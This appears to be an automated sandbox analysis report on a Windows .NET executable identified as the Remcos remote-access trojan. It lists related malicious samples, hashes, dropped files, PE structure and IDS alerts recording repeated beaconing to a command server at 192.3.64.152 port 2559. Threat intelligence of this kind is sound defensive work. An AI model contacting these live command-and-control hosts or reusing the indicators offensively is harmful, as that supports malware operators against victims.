178.237.33.50 | z120X20SO__UK__EKMELAMA.exe | Get hash | malicious | GuLoader, Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | orders_PI 008-01.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | segura.vbs | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 4qmS30qgbA.exe | Get hash | malicious | Remcos, AsyncRAT, PureLog Stealer | Browse | geoplugin.net/json.gp
178.237.33.50 | New_Order_#070824_Order_November-2024-pdf.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | z1ProductSampleRequirement.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 5Tqze.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
192.3.64.152 | New Order.exe | Get hash | malicious | Remcos | Browse |
192.3.64.152 | UsoOuMVYCv8QrxG.exe | Get hash | malicious | Remcos | Browse |
192.3.64.152 | New Order.exe | Get hash | malicious | Remcos | Browse |
192.3.64.152 | SecuriteInfo.com.Trojan.PackedNET.3042.4675.2937.exe | Get hash | malicious | Remcos | Browse |
192.3.64.152 | Quote.exe | Get hash | malicious | Remcos | Browse |
192.3.64.152 | SecuriteInfo.com.Win32.PWSX-gen.3135.16188.exe | Get hash | malicious | Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geoplugin.net | z120X20SO__UK__EKMELAMA.exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
geoplugin.net | 1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | orders_PI 008-01.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | segura.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 4qmS30qgbA.exe | Get hash | malicious | Remcos, AsyncRAT, PureLog Stealer | Browse | 178.237.33.50
geoplugin.net | New_Order_#070824_Order_November-2024-pdf.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | z1ProductSampleRequirement.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 5Tqze.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-COLOCROSSINGUS | bestgreetingwithbestthingsevermadewithgreatthigns.hta | Get hash | malicious | Cobalt Strike, HTMLPhisher | Browse | 104.168.7.52
AS-COLOCROSSINGUS | orden de compra_.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 23.95.60.88
AS-COLOCROSSINGUS | Scan docs.xls | Get hash | malicious | HTMLPhisher, Lokibot | Browse | 104.168.7.52
AS-COLOCROSSINGUS | bin.x86.elf | Get hash | malicious | Mirai | Browse | 198.12.107.126
AS-COLOCROSSINGUS | givingbestthignswithgreatheatcaptialthingstodo.hta | Get hash | malicious | Cobalt Strike, HTMLPhisher | Browse | 107.173.4.23
AS-COLOCROSSINGUS | Payment Advice-Ref[A22D4YdWsbE4].xla.xlsx | Get hash | malicious | FormBook, HTMLPhisher | Browse | 107.173.4.23
AS-COLOCROSSINGUS | ORDER-24110394.PDF.js | Get hash | malicious | Unknown | Browse | 192.3.220.6
AS-COLOCROSSINGUS | sora.mips.elf | Get hash | malicious | Mirai | Browse | 104.168.36.42
AS-COLOCROSSINGUS | Payload 94.75.225.exe | Get hash | malicious | Unknown | Browse | 107.173.148.133
AS-COLOCROSSINGUS | New_Order_#070824_Order_November-2024-pdf.exe | Get hash | malicious | Remcos | Browse | 198.46.178.148
ATOM86-ASATOM86NL | z120X20SO__UK__EKMELAMA.exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | orders_PI 008-01.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | segura.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 4qmS30qgbA.exe | Get hash | malicious | Remcos, AsyncRAT, PureLog Stealer | Browse | 178.237.33.50
ATOM86-ASATOM86NL | New_Order_#070824_Order_November-2024-pdf.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | z1ProductSampleRequirement.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 5Tqze.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                                                                                        No context
                                                                                        No context
Process: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1857
Entropy (8bit): 5.335252129103664
Encrypted: false
SSDEEP: 48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxvvHgJHreylEHj:Pq5qHwCYqh3oPtI6eqzxRH0aymD
MD5: 05A6C6CE6A57DDE158E748519EF089B5
SHA1: 62A4471748806FA7FF0CEBD3ED25A116B857696A
SHA-256: F548183BE140AF9BE9FF2BD946C716EABC0C6E61F0E946D4B75E55B3F29F9FF7
SHA-512: 5358022174E0F48D881253AB5E018982E27BC7B316D7C7C23D18BEE9D67886ACB8A21D7AAF9FA139A770FC36ED69ACBCCBBC857B5D91B087EB212ECE3C036E52
Malicious: true
Reputation: low
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
File Type: JSON data
Category: dropped
Size (bytes): 957
Entropy (8bit): 5.009232287567204
Encrypted: false
SSDEEP: 24:qsdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:xPN0GX85mvhjTkvfEro
MD5: 759439A00540A5351C6ED1D4E86C08CC
SHA1: B3C8DC85717DA6D27CF8A3F2533216BD9DA8DD0F
SHA-256: 457CC36B09721B31358CCB09F7822FBBF3CB120FA03349642814CB0A9B107126
SHA-512: 90F41E51A1BA10CE2D3DF77A34FF108BADA8AD3B983689726FC9911796CE735A5650233BD32F0CB2C86B894908E313405FD8DDA00E64C7127958CE9C164EC3A8
Malicious: false
Reputation: low
Preview: {. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
File Type: JSON data
Category: dropped
Size (bytes): 957
Entropy (8bit): 5.007783152825393
Encrypted: false
SSDEEP: 24:qsdVauKyGX85jHf3SvXhNlT3/7YvfbYro:xba0GX85mvhjTkvfEro
MD5: F99E3CC739CD019967DE40D24B446288
SHA1: 71A5A38A8B0F8AEEE32F920C3409B96B94944873
SHA-256: 1A65241C137EC24902D7353417216243DA84A16FA6D94CC7919003996B6EED09
SHA-512: 429C42CE09E60E924C5B1B5EAEC01BA02980AFC85B859CD1CEBF8B6A3D30075512932A9163103C3A74A230F7FEDA1467491981BDBF8A1426710E45B9DD0AF63C
Malicious: false
Reputation: low
Preview: {. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.833247374701901
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: 6Ctc0o7vhqKgjU7.exe
File size: 1'042'944 bytes
MD5: 5f9342df635d0a624f0284fa5bbd8b54
SHA1: 15c64139cc8663711d5521d49e867de1906e0f88
SHA256: 63ac85fa66152f936244088e40eb124a6888336a4508f8d3d63d818ad30e4280
SHA512: 51c222546e0faa6a6ef580dca8ebea1593ed4843a079c885d029180a82ec031b69542513b97dc6336492870d8d5d8b72305ff2bfdbcc251e2e8dd64ca4fbe400
SSDEEP: 24576:3SovmQ+1DClLHxclthaYAsPxhNX7VuZQvuanF:3SMp+1DCllcnh5A+hNkCvuQ
TLSH: 9225F1E03B327729DEA94A34D259DDB692E20AA8B0447AF725DC3B5734CC112EE0CF55
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.)g..............0.............^.... ........@.. .......................@............@................................
Icon Hash: a1844e6f2f4f6f3b
Entrypoint: 0x4ff25e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6729837E [Tue Nov 5 02:31:26 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xff20c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x10a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x102000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xfd264 | 0xfd400 | 5b90f19cbf5256cc9bcae3b3fe68880c | False | 0.9064804031959526 | data | 7.838238330749531 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x100000 | 0x10a0 | 0x1200 | 5b102d8b2196a2aec1d1bbc638e58828 | False | 0.365234375 | data | 5.9887205070970175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x102000 | 0xc | 0x200 | f70dd702c1e90ecae766b0fde8299ea3 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100100 | 0xa34 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.36294027565084225
RT_GROUP_ICON | 0x100b44 | 0x14 | data | | | 1.05
RT_VERSION | 0x100b68 | 0x338 | data | | | 0.4308252427184466
RT_MANIFEST | 0x100eb0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-05T11:00:06.638409+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449732192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:08.654038+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449734178.237.33.5080TCP
                                                                                        2024-11-05T11:00:22.102362+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449737TCP
                                                                                        2024-11-05T11:00:38.780201+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449743192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:40.297031+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449744192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:41.840557+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449745192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:43.365692+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449746192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:44.926946+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449747192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:46.455416+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449748192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:47.983994+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449749192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:49.511785+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449750192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:51.032906+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449751192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:52.555688+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449752192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:54.092502+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449753192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:55.806477+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449754192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:57.390141+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449755192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:58.923499+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449756192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:00.462297+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449759192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:00.945958+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449758TCP
                                                                                        2024-11-05T11:01:02.006446+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449760192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:03.547036+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449770192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:05.076623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449781192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:06.620764+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449791192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:08.156592+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449798192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:09.687902+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449809192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:11.323923+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449819192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:12.849107+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449830192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:14.367356+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449836192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:15.876289+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449847192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:17.399262+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449858192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:18.972734+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449866192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:20.734121+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449875192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:23.273775+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449891178.237.33.5080TCP
                                                                                        2024-11-05T11:02:52.281240+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450038192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:53.797351+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450039192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:55.336861+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450040192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:56.865531+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450041192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:58.360089+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450042192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:59.828922+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450043192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:01.395703+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450044192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:02.790801+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450045192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:04.635247+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450046192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:05.985002+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450047192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:07.289006+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450048192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:08.580628+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450049192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:09.839104+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450050192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:11.075772+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450051192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:12.286988+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450052192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:13.478471+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450053192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:14.646913+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450054192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:15.977568+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450055192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:17.104528+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450056192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:18.217231+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450057192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:19.325075+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450058192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:20.390850+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450059192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:21.436759+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450060192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:22.592461+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450061192.3.64.1522559TCP
2024-11-05T11:03:23.605016+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50062 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:24.619841+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50063 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:25.603330+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50064 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:26.603845+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50065 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:27.554029+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50066 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:28.486990+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50067 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:29.410772+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50068 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:30.312138+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50069 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:31.214878+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50070 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:32.099975+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50071 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:32.991461+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50072 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:33.850975+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50073 | 192.3.64.152 | 2559 | TCP
2024-11-05T11:03:34.703120+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50074 | 192.3.64.152 | 2559 | TCP
